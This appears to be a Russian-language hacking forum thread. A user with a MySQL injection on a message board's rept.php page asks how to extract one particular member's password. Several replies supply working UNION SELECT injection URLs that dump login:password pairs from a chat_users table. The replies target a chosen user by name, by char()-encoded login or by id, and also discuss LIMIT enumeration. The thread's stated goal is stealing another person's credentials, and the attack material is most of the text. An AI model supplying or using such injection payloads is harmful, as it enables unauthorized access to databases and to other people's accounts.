Есть MySQL-inj , в базе дофигища юзеров а мне нужен пасс конкретно одного (не админа), как можно составить запрос чтоб выдало пасс конкретного юзера?...допустим
http://test.com/board/rept.php?id=-1+union+select+concat(login,0x3a,password),0,0,0+f rom+chat_users/*
Выдаст нейм:пасс, а как сделать чтоб конкретного юзера?
p.s. limit не предлагать))(Выдает только по одному)

пользуйся limit+0,1 и т.д.)))) а вообще найди айди тваоего юзера и вокруге перебирай циферки

мне нужен пасс конкретно одного
(Выдает только по одному)
Ты определись. :) Узнай порядковый номер пользователя в базе и составь запрос....
Ну или:
...from+chat_users+where+login=char(ися пользователя в char`е)/*

попробуй так так
-1+union+select+concat(password),0,0,0+from+chat_us ers+where+login='name'/*
где name имя нужно юзера

судя по твоему форуму/доске у тя участвует ид пользователя

rept.php?id=
ну вот найди линк на его репутацию и используй запрос
http://test.com/board/rept.php?id=-1+union+select+concat(login,0x3a,password),0,0,0+f rom+chat_users+where+id=[value]/*

где вместо [value] вставь значение ид

пользуйся limit+0,1 и т.д.)))) а вообще найди айди тваоего юзера и вокруге перебирай циферки

Угу невероятно дельный совет, зачем что то говорить и советовать если сам это не знаешь?

Перебирать лимитом крайне не рационально:

1) Если запись пользователя тысячная или даже сотая, то это займет очень много времени
2) Даже если знать id пользователя (кстати далеко не обязательно что такой параметр есть именно в таблице с пользователями) то далеко не обязательно что id пользователя совпадет с номером записи

Здесь надо было делать:

Ты определись. :) Узнай порядковый номер пользователя в базе и составь запрос....
Ну или:
...from+chat_users+where+login=char(ися пользователя в char`е)/*

Вообще так и только так, а не искать порядковые номера и т.д. - все должно быть сделано максимально рационально.

p.s Qwertison - юзай пожалуйста поиск ты почти каждый день создаёшь темы, а нужную инфу легко найти в статьях, да и тему "Ваши вопросы по уязвимостям." никто не отменял, здавай такие вопросы в ней.

Для кого создана - http://forum.antichat.ru/thread46016.html - эта тема?